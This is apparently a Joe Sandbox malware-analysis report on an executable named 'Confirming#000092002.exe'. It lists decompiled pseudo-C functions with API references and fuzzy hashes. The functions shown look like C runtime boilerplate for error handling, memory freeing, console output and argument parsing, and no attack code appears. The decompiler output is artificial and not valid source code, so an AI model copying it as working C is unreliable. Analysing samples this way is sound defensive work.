    C-Code - Quality: 72%
    			E00EA90A4(void* __ecx, void* __edx) {
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t2;
    				long _t3;
    				intOrPtr _t5;
    				long _t6;
    				intOrPtr _t9;
    				long _t10;
    				signed int _t39;
    				signed int _t40;
    				void* _t43;
    				void* _t49;
    				signed int _t51;
    				signed int _t53;
    				signed int _t54;
    				long _t56;
    				long _t60;
    				long _t61;
    				void* _t65;
    
    				_t49 = __edx;
    				_t43 = __ecx;
    				_t60 = GetLastError();
    				_t2 =  *0xeb9050; // 0x6
    				_t67 = _t2 - 0xffffffff;
    				if(_t2 == 0xffffffff) {
    					L6:
    					_t3 = E00EA995D(__eflags, _t2, 0xffffffff);
    					__eflags = _t3;
    					if(_t3 == 0) {
    						goto L3;
    					} else {
    						_t51 = E00EA9E27(1, 0x364);
    						_pop(_t43);
    						__eflags = _t51;
    						if(__eflags != 0) {
    							__eflags = E00EA995D(__eflags,  *0xeb9050, _t51);
    							if(__eflags != 0) {
    								E00EA8ED2(_t51, 0xfe295c);
    								E00EA8B82(0);
    								_t65 = _t65 + 0xc;
    								goto L13;
    							} else {
    								_t39 = 0;
    								E00EA995D(__eflags,  *0xeb9050, 0);
    								_push(_t51);
    								goto L9;
    							}
    						} else {
    							_t39 = 0;
    							__eflags = 0;
    							E00EA995D(0,  *0xeb9050, 0);
    							_push(0);
    							L9:
    							E00EA8B82();
    							_pop(_t43);
    							goto L4;
    						}
    					}
    				} else {
    					_t51 = E00EA991E(_t67, _t2);
    					if(_t51 == 0) {
    						_t2 =  *0xeb9050; // 0x6
    						goto L6;
    					} else {
    						if(_t51 != 0xffffffff) {
    							L13:
    							_t39 = _t51;
    						} else {
    							L3:
    							_t39 = 0;
    							L4:
    							_t51 = _t39;
    						}
    					}
    				}
    				SetLastError(_t60);
    				asm("sbb edi, edi");
    				_t53 =  ~_t51 & _t39;
    				if(_t53 == 0) {
    					E00EA8A26(_t39, _t43, _t49, _t53, _t60);
    					asm("int3");
    					_t5 =  *0xeb9050; // 0x6
    					_push(_t60);
    					__eflags = _t5 - 0xffffffff;
    					if(__eflags == 0) {
    						L22:
    						_t6 = E00EA995D(__eflags, _t5, 0xffffffff);
    						__eflags = _t6;
    						if(_t6 == 0) {
    							goto L31;
    						} else {
    							_t60 = E00EA9E27(1, 0x364);
    							_pop(_t43);
    							__eflags = _t60;
    							if(__eflags != 0) {
    								__eflags = E00EA995D(__eflags,  *0xeb9050, _t60);
    								if(__eflags != 0) {
    									E00EA8ED2(_t60, 0xfe295c);
    									E00EA8B82(0);
    									_t65 = _t65 + 0xc;
    									goto L29;
    								} else {
    									E00EA995D(__eflags,  *0xeb9050, _t21);
    									_push(_t60);
    									goto L25;
    								}
    							} else {
    								E00EA995D(__eflags,  *0xeb9050, _t20);
    								_push(_t60);
    								L25:
    								E00EA8B82();
    								_pop(_t43);
    								goto L31;
    							}
    						}
    					} else {
    						_t60 = E00EA991E(__eflags, _t5);
    						__eflags = _t60;
    						if(__eflags == 0) {
    							_t5 =  *0xeb9050; // 0x6
    							goto L22;
    						} else {
    							__eflags = _t60 - 0xffffffff;
    							if(_t60 == 0xffffffff) {
    								L31:
    								E00EA8A26(_t39, _t43, _t49, _t53, _t60);
    								asm("int3");
    								_push(_t39);
    								_push(_t60);
    								_push(_t53);
    								_t61 = GetLastError();
    								_t9 =  *0xeb9050; // 0x6
    								__eflags = _t9 - 0xffffffff;
    								if(__eflags == 0) {
    									L38:
    									_t10 = E00EA995D(__eflags, _t9, 0xffffffff);
    									__eflags = _t10;
    									if(_t10 == 0) {
    										goto L35;
    									} else {
    										_t54 = E00EA9E27(1, 0x364);
    										__eflags = _t54;
    										if(__eflags != 0) {
    											__eflags = E00EA995D(__eflags,  *0xeb9050, _t54);
    											if(__eflags != 0) {
    												E00EA8ED2(_t54, 0xfe295c);
    												E00EA8B82(0);
    												goto L45;
    											} else {
    												_t40 = 0;
    												E00EA995D(__eflags,  *0xeb9050, 0);
    												_push(_t54);
    												goto L41;
    											}
    										} else {
    											_t40 = 0;
    											__eflags = 0;
    											E00EA995D(0,  *0xeb9050, 0);
    											_push(0);
    											L41:
    											E00EA8B82();
    											goto L36;
    										}
    									}
    								} else {
    									_t54 = E00EA991E(__eflags, _t9);
    									__eflags = _t54;
    									if(__eflags == 0) {
    										_t9 =  *0xeb9050; // 0x6
    										goto L38;
    									} else {
    										__eflags = _t54 - 0xffffffff;
    										if(_t54 != 0xffffffff) {
    											L45:
    											_t40 = _t54;
    										} else {
    											L35:
    											_t40 = 0;
    											__eflags = 0;
    											L36:
    											_t54 = _t40;
    										}
    									}
    								}
    								SetLastError(_t61);
    								asm("sbb edi, edi");
    								_t56 =  ~_t54 & _t40;
    								__eflags = _t56;
    								return _t56;
    							} else {
    								L29:
    								__eflags = _t60;
    								if(_t60 == 0) {
    									goto L31;
    								} else {
    									return _t60;
    								}
    							}
    						}
    					}
    				} else {
    					return _t53;
    				}
    			}
























    APIs
    • GetLastError.KERNEL32(?,?,?,00EA7123,?,?,00000000,?,00EA9C0E,00000000,00000000,?,00000000), ref: 00EA90A9
    • _free.LIBCMT ref: 00EA9106
    • _free.LIBCMT ref: 00EA913C
    • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00EA9C0E,00000000,00000000,?,00000000), ref: 00EA9147
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID: ErrorLast_free
    • String ID:
    • API String ID: 2283115069-0
    • Opcode ID: a5041426a46b43ef0d9181da83d7ce6dc19ca1e7a95113cfb6308239cdb2ecc9
    • Instruction ID: cb846dce21618df4a499a2d4c06e2f4fa2219c0a62b52e15d5a978dd0a8606ab
    • Opcode Fuzzy Hash: a5041426a46b43ef0d9181da83d7ce6dc19ca1e7a95113cfb6308239cdb2ecc9
    • Instruction Fuzzy Hash: 5E118A712051026EDA1136B59CC5D6B27D99BDF3B9B252328F229BF1E3DD61AC099120
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E00EA91FB(void* __ecx) {
    				intOrPtr _t2;
    				signed int _t3;
    				signed int _t13;
    				signed int _t18;
    				long _t21;
    
    				_t21 = GetLastError();
    				_t2 =  *0xeb9050; // 0x6
    				_t24 = _t2 - 0xffffffff;
    				if(_t2 == 0xffffffff) {
    					L6:
    					_t3 = E00EA995D(__eflags, _t2, 0xffffffff);
    					__eflags = _t3;
    					if(_t3 == 0) {
    						goto L3;
    					} else {
    						_t18 = E00EA9E27(1, 0x364);
    						__eflags = _t18;
    						if(__eflags != 0) {
    							__eflags = E00EA995D(__eflags,  *0xeb9050, _t18);
    							if(__eflags != 0) {
    								E00EA8ED2(_t18, 0xfe295c);
    								E00EA8B82(0);
    								goto L13;
    							} else {
    								_t13 = 0;
    								E00EA995D(__eflags,  *0xeb9050, 0);
    								_push(_t18);
    								goto L9;
    							}
    						} else {
    							_t13 = 0;
    							__eflags = 0;
    							E00EA995D(0,  *0xeb9050, 0);
    							_push(0);
    							L9:
    							E00EA8B82();
    							goto L4;
    						}
    					}
    				} else {
    					_t18 = E00EA991E(_t24, _t2);
    					if(_t18 == 0) {
    						_t2 =  *0xeb9050; // 0x6
    						goto L6;
    					} else {
    						if(_t18 != 0xffffffff) {
    							L13:
    							_t13 = _t18;
    						} else {
    							L3:
    							_t13 = 0;
    							L4:
    							_t18 = _t13;
    						}
    					}
    				}
    				SetLastError(_t21);
    				asm("sbb edi, edi");
    				return  ~_t18 & _t13;
    			}









    APIs
    • GetLastError.KERNEL32(?,?,?,00EA75D9,00EA116B), ref: 00EA9200
    • _free.LIBCMT ref: 00EA925D
    • _free.LIBCMT ref: 00EA9293
    • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,00EA75D9,00EA116B), ref: 00EA929E
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID: ErrorLast_free
    • String ID:
    • API String ID: 2283115069-0
    • Opcode ID: e792f8f0f293a182602bf83a47508d3717bc3c939a6daf660f011198514e50d5
    • Instruction ID: 9ec8bbcaf90c9f181bd5faa010dae6afbcfa554929cbcafe62533c576d34562e
    • Opcode Fuzzy Hash: e792f8f0f293a182602bf83a47508d3717bc3c939a6daf660f011198514e50d5
    • Instruction Fuzzy Hash: 391152762041017E961126AABC85F6B37D99BCF779B242728F628BE1F3DD61AC099130
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00EAF486(void* _a4, long _a8, DWORD* _a12) {
    				void* _t13;
    
    				_t13 = WriteConsoleW( *0xeb9860, _a4, _a8, _a12, 0);
    				if(_t13 == 0 && GetLastError() == 6) {
    					E00EAF46F();
    					E00EAF431();
    					_t13 = WriteConsoleW( *0xeb9860, _a4, _a8, _a12, _t13);
    				}
    				return _t13;
    			}





    APIs
    • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00EAE629,?,00000001,?,?,?,00EAD89C,?,00000000,?), ref: 00EAF49D
    • GetLastError.KERNEL32(?,00EAE629,?,00000001,?,?,?,00EAD89C,?,00000000,?,?,?,?,00EADDE8,00000000), ref: 00EAF4A9
      • Part of subcall function 00EAF46F: CloseHandle.KERNEL32(FFFFFFFE,00EAF4B9,?,00EAE629,?,00000001,?,?,?,00EAD89C,?,00000000,?,?,?), ref: 00EAF47F
    • ___initconout.LIBCMT ref: 00EAF4B9
      • Part of subcall function 00EAF431: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00EAF460,00EAE616,?,?,00EAD89C,?,00000000,?,?), ref: 00EAF444
    • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00EAE629,?,00000001,?,?,?,00EAD89C,?,00000000,?,?), ref: 00EAF4CE
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
    • String ID:
    • API String ID: 2744216297-0
    • Opcode ID: 9f66d7ecff9028ec42e867063fd75362e5e3d98fd2c9ba405ced9a435c0a42a1
    • Instruction ID: 7f40a4743ea0bbca9cf45ad54f9869c65b769437b5902fbeba54f8d8b1388368
    • Opcode Fuzzy Hash: 9f66d7ecff9028ec42e867063fd75362e5e3d98fd2c9ba405ced9a435c0a42a1
    • Instruction Fuzzy Hash: FFF09E36500159BFCF122FD69C0499B3E66FB4E371B544264FA28A9131D6319864EB90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00EA85AB() {
    
    				E00EA8B82( *0xfe2954);
    				 *0xfe2954 = 0;
    				E00EA8B82( *0xfe2958);
    				 *0xfe2958 = 0;
    				E00EA8B82( *0xfe2db0);
    				 *0xfe2db0 = 0;
    				E00EA8B82( *0xfe2db4);
    				 *0xfe2db4 = 0;
    				return 1;
    			}




    APIs
    • _free.LIBCMT ref: 00EA85B4
      • Part of subcall function 00EA8B82: HeapFree.KERNEL32(00000000,00000000,?,00EABD3B,?,00000000,?,?,?,00EABD62,?,00000007,?,?,00EAC188,?), ref: 00EA8B98
      • Part of subcall function 00EA8B82: GetLastError.KERNEL32(?,?,00EABD3B,?,00000000,?,?,?,00EABD62,?,00000007,?,?,00EAC188,?,?), ref: 00EA8BAA
    • _free.LIBCMT ref: 00EA85C7
    • _free.LIBCMT ref: 00EA85D8
    • _free.LIBCMT ref: 00EA85E9
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 0e3f52910dba62ef9c1306447d616860fd1902321afb21db450ec0a11c32527e
    • Instruction ID: e24cf4cef0b5c45654f83dc7edc80604fa86024ffe3a0c9d314aac80fed49ecd
    • Opcode Fuzzy Hash: 0e3f52910dba62ef9c1306447d616860fd1902321afb21db450ec0a11c32527e
    • Instruction Fuzzy Hash: 71E086B44011EC9A86E26F14FE9188D3FADF759720B443105F0002E232EF391653BBB0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E00EA7CE5(void* __edx, intOrPtr _a4) {
    				signed int _v8;
    				void* _v12;
    				char _v16;
    				char* _v20;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				char* _t26;
    				intOrPtr* _t36;
    				signed int _t37;
    				signed int _t40;
    				char _t42;
    				signed int _t43;
    				intOrPtr* _t44;
    				intOrPtr* _t45;
    				intOrPtr _t48;
    				signed int _t49;
    				signed int _t54;
    				void* _t57;
    				intOrPtr* _t58;
    				signed int _t64;
    				signed int _t66;
    
    				_t57 = __edx;
    				_t48 = _a4;
    				if(_t48 != 0) {
    					__eflags = _t48 - 2;
    					if(_t48 == 2) {
    						L5:
    						E00EAAD73(_t48);
    						E00EAA7BA(_t48, _t57, 0, 0xfe27f8, 0, 0xfe27f8, 0x104);
    						_t26 =  *0xfe2db8; // 0x1443350
    						 *0xfe2da8 = 0xfe27f8;
    						_v20 = _t26;
    						__eflags = _t26;
    						if(_t26 == 0) {
    							L7:
    							_t26 = 0xfe27f8;
    							_v20 = 0xfe27f8;
    							L8:
    							_v8 = 0;
    							_v16 = 0;
    							_t64 = E00EA7F8F(E00EA7E1B( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
    							__eflags = _t64;
    							if(__eflags != 0) {
    								E00EA7E1B( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
    								__eflags = _t48 - 1;
    								if(_t48 != 1) {
    									_v12 = 0;
    									_push( &_v12);
    									_t49 = E00EAA6AD(_t64, _t64);
    									__eflags = _t49;
    									if(_t49 == 0) {
    										_t58 = _v12;
    										_t54 = 0;
    										_t36 = _t58;
    										__eflags =  *_t58;
    										if( *_t58 == 0) {
    											L17:
    											_t37 = 0;
    											 *0xfe2dac = _t54;
    											_v12 = 0;
    											_t49 = 0;
    											 *0xfe2db0 = _t58;
    											L18:
    											E00EA8B82(_t37);
    											_v12 = 0;
    											L19:
    											E00EA8B82(_t64);
    											_t40 = _t49;
    											L20:
    											return _t40;
    										} else {
    											goto L16;
    										}
    										do {
    											L16:
    											_t36 = _t36 + 4;
    											_t54 = _t54 + 1;
    											__eflags =  *_t36;
    										} while ( *_t36 != 0);
    										goto L17;
    									}
    									_t37 = _v12;
    									goto L18;
    								}
    								_t42 = _v8 - 1;
    								__eflags = _t42;
    								 *0xfe2dac = _t42;
    								_t43 = _t64;
    								_t64 = 0;
    								 *0xfe2db0 = _t43;
    								L12:
    								_t49 = 0;
    								goto L19;
    							}
    							_t44 = E00EA75D4(__eflags);
    							_push(0xc);
    							_pop(0);
    							 *_t44 = 0;
    							goto L12;
    						}
    						__eflags =  *_t26;
    						if( *_t26 != 0) {
    							goto L8;
    						}
    						goto L7;
    					}
    					__eflags = _t48 - 1;
    					if(__eflags == 0) {
    						goto L5;
    					}
    					_t45 = E00EA75D4(__eflags);
    					_t66 = 0x16;
    					 *_t45 = _t66;
    					E00EA748C();
    					_t40 = _t66;
    					goto L20;
    				}
    				return 0;
    			}


























    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID:
    • String ID: C:\Users\user\Desktop\Confirming#000092002.exe
    • API String ID: 0-2125958311
    • Opcode ID: b9cfcaa721981d05e8f27296d116aac5779fe07ccd144c276228309ed372382f
    • Instruction ID: f2c2a9fc57bb0721bfb3293ced006fd3362b8c7e27666ba5efbc5b740ff18678
    • Opcode Fuzzy Hash: b9cfcaa721981d05e8f27296d116aac5779fe07ccd144c276228309ed372382f
    • Instruction Fuzzy Hash: 40417371A08258AFCB21DF998C819AEBBF8EF8E314F14506AE544FF211D7706E40DB50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 58%
    			E00EA64B6(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
    				signed int _v8;
    				signed int _v12;
    				intOrPtr* _v16;
    				signed int _v20;
    				char _v24;
    				intOrPtr _v28;
    				signed int _v36;
    				void* _v40;
    				intOrPtr _v44;
    				signed int _v48;
    				intOrPtr _v56;
    				void _v60;
    				signed char* _v68;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				void* _t74;
    				void* _t75;
    				char _t76;
    				signed char _t78;
    				signed int _t80;
    				signed char* _t81;
    				signed int _t82;
    				signed int _t83;
    				intOrPtr* _t87;
    				void* _t90;
    				signed char* _t93;
    				intOrPtr* _t96;
    				signed char _t97;
    				intOrPtr _t98;
    				intOrPtr _t99;
    				intOrPtr* _t101;
    				signed int _t102;
    				signed int _t103;
    				signed char _t108;
    				signed char* _t111;
    				signed int _t112;
    				void* _t113;
    				signed char* _t116;
    				void* _t121;
    				signed int _t123;
    				void* _t130;
    				void* _t131;
    
    				_t110 = __edx;
    				_t100 = __ecx;
    				_t96 = _a4;
    				if( *_t96 == 0x80000003) {
    					return _t74;
    				} else {
    					_push(_t121);
    					_push(_t113);
    					_t75 = E00EA5DCC(_t96, __ecx, __edx, _t113, _t121);
    					if( *((intOrPtr*)(_t75 + 8)) != 0) {
    						__imp__EncodePointer(0);
    						_t121 = _t75;
    						if( *((intOrPtr*)(E00EA5DCC(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
    							_t87 = E00EA4F23(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
    							_t130 = _t130 + 0x1c;
    							if(_t87 != 0) {
    								L16:
    								return _t87;
    							}
    						}
    					}
    					_t76 = _a20;
    					_v24 = _t76;
    					_v20 = 0;
    					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
    						_push(_a28);
    						E00EA4E56(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
    						_t112 = _v36;
    						_t131 = _t130 + 0x18;
    						_t87 = _v40;
    						_v16 = _t87;
    						_v8 = _t112;
    						if(_t112 < _v28) {
    							_t102 = _t112 * 0x14;
    							_v12 = _t102;
    							do {
    								_t103 = 5;
    								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
    								_t131 = _t131 + 0xc;
    								if(_v60 <= _t90 && _t90 <= _v56) {
    									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
    									_t108 = _t93[4];
    									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
    										if(( *_t93 & 0x00000040) == 0) {
    											_push(0);
    											_push(1);
    											E00EA6091(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
    											_t112 = _v8;
    											_t131 = _t131 + 0x30;
    										}
    									}
    								}
    								_t112 = _t112 + 1;
    								_t87 = _v16;
    								_t102 = _v12 + 0x14;
    								_v8 = _t112;
    								_v12 = _t102;
    							} while (_t112 < _v28);
    						}
    						goto L16;
    					}
    					E00EA8A26(_t96, _t100, _t110, 0, _t121);
    					asm("int3");
    					_t111 = _v68;
    					_push(_t96);
    					_push(_t121);
    					_push(0);
    					_t78 = _t111[4];
    					if(_t78 == 0) {
    						L41:
    						_t80 = 1;
    					} else {
    						_t101 = _t78 + 8;
    						if( *_t101 == 0) {
    							goto L41;
    						} else {
    							_t116 = _a4;
    							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
    								_t97 = _t116[4];
    								_t123 = 0;
    								if(_t78 == _t97) {
    									L33:
    									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
    										_t81 = _a8;
    										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
    											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
    												_t123 = 1;
    											}
    										}
    									}
    									_t80 = _t123;
    								} else {
    									_t59 = _t97 + 8; // 0x6e
    									_t82 = _t59;
    									while(1) {
    										_t98 =  *_t101;
    										if(_t98 !=  *_t82) {
    											break;
    										}
    										if(_t98 == 0) {
    											L29:
    											_t83 = _t123;
    										} else {
    											_t99 =  *((intOrPtr*)(_t101 + 1));
    											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
    												break;
    											} else {
    												_t101 = _t101 + 2;
    												_t82 = _t82 + 2;
    												if(_t99 != 0) {
    													continue;
    												} else {
    													goto L29;
    												}
    											}
    										}
    										L31:
    										if(_t83 == 0) {
    											goto L33;
    										} else {
    											_t80 = 0;
    										}
    										goto L42;
    									}
    									asm("sbb eax, eax");
    									_t83 = _t82 | 0x00000001;
    									goto L31;
    								}
    							} else {
    								goto L41;
    							}
    						}
    					}
    					L42:
    					return _t80;
    				}
    			}


    APIs
    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00EA64DB
    Strings
    Similarity
    • API ID: EncodePointer
    • String ID: MOC$RCC
    • API String ID: 2118026453-2084237596
    • Opcode ID: 60dbeaa94420034b7a80aca16de02220d569ed711bc1904a87e8479527d4fa4b
    • Instruction ID: e0c14e4e68d739ffd764327054392e1355c6caca9596a5620bacf98353264f75
    • Opcode Fuzzy Hash: 60dbeaa94420034b7a80aca16de02220d569ed711bc1904a87e8479527d4fa4b
    • Instruction Fuzzy Hash: DD417B72D00209AFCF15DFA4C981AAEBBB5FF4E304F185499F9147B265D335AA50CB50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 45%
    			E00EA2C50(CHAR* __ebx, CHAR** __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
    				signed int _v8;
    				char _v4104;
    				signed int _v4108;
    				intOrPtr _v4112;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				signed int _t29;
    				char _t38;
    				char* _t52;
    				intOrPtr* _t60;
    				void* _t63;
    				intOrPtr* _t64;
    				void* _t65;
    				char _t66;
    				signed int _t67;
    				signed int _t68;
    				void* _t69;
    
    				_t69 = __eflags;
    				_t63 = __edx;
    				_t51 = __ebx;
    				E00EB02C0(0x100c);
    				_t29 =  *0xeb9008; // 0x64e1d101
    				_v8 = _t29 ^ _t68;
    				_v4108 = _v4108 & 0x00000000;
    				_t64 = __ecx;
    				_t66 = E00EA29E8(__ebx, __ecx, __ecx, _t65, _t69, _a4,  &_v4108);
    				if(_t66 >= 0) {
    					_push(__ebx);
    					_t52 = _v4108;
    					 *((intOrPtr*)(__ecx)) = _t52;
    					if( *_t52 != 0) {
    						while(1) {
    							_t66 = E00EA2327(_t64,  &_v4104);
    							if(_t66 < 0) {
    								goto L7;
    							}
    							_t67 = 0;
    							while(lstrcmpiA( &_v4104,  *(0xeb61b0 + _t67 * 8)) != 0) {
    								_t67 = _t67 + 1;
    								if(_t67 < 0xe) {
    									continue;
    								} else {
    									L6:
    									_t66 = 0x80020009;
    								}
    								goto L7;
    							}
    							_t38 =  *((intOrPtr*)(0xeb61b4 + _t67 * 8));
    							_v4108 = _t38;
    							__eflags = _t38;
    							if(_t38 == 0) {
    								goto L6;
    							} else {
    								_t66 = E00EA2327(_t64,  &_v4104);
    								__eflags = _t66;
    								if(_t66 < 0) {
    									goto L7;
    								} else {
    									__eflags = _v4104 - 0x7b;
    									if(_v4104 != 0x7b) {
    										goto L6;
    									} else {
    										__eflags = _a8;
    										_t60 = _t64;
    										_push(0);
    										if(_a8 == 0) {
    											_push(0);
    											_push(_v4108);
    											_push( &_v4104);
    											_t66 = E00EA2DA0(_t60, _t63);
    											__eflags = _t66;
    											if(_t66 < 0) {
    												goto L7;
    											} else {
    												goto L16;
    											}
    										} else {
    											_push(_a8);
    											_push(_v4108);
    											_v4112 =  *_t64;
    											_push( &_v4104);
    											_t66 = E00EA2DA0(_t60, _t63);
    											__eflags = _t66;
    											if(_t66 >= 0) {
    												L16:
    												E00EA22FE(_t64);
    												__eflags =  *((char*)( *_t64));
    												if( *((char*)( *_t64)) != 0) {
    													continue;
    												} else {
    													goto L7;
    												}
    											} else {
    												 *_t64 = _v4112;
    												E00EA2DA0(_t64, _t63,  &_v4104, _v4108, 0, 0);
    												goto L7;
    											}
    										}
    									}
    								}
    							}
    							L18:
    						}
    					}
    					L7:
    					__imp__CoTaskMemFree();
    					_t32 = _t66;
    					_t51 = _t52;
    				}
    				return E00EA403C(_t32, _t51, _v8 ^ _t68, _t63, _t64, _t66);
    				goto L18;
    			}


    APIs
      • Part of subcall function 00EA29E8: __EH_prolog3_GS.LIBCMT ref: 00EA29EF
      • Part of subcall function 00EA29E8: _strlen.LIBCMT ref: 00EA2A14
      • Part of subcall function 00EA29E8: CoTaskMemAlloc.OLE32(00000000,00000040,00EA2C84,?,00000000,00000000,?), ref: 00EA2A2E
      • Part of subcall function 00EA29E8: CoTaskMemFree.OLE32(?), ref: 00EA2C39
    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000000,?), ref: 00EA2CD2
      • Part of subcall function 00EA2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA235A
      • Part of subcall function 00EA2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA236A
      • Part of subcall function 00EA2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA2379
      • Part of subcall function 00EA2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA2383
      • Part of subcall function 00EA2327: CharNextA.USER32(?,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA23D5
    • lstrcmpiA.KERNEL32(?,?,00000000,?,00000000,00000000,?), ref: 00EA2CBC
    Strings
    Similarity
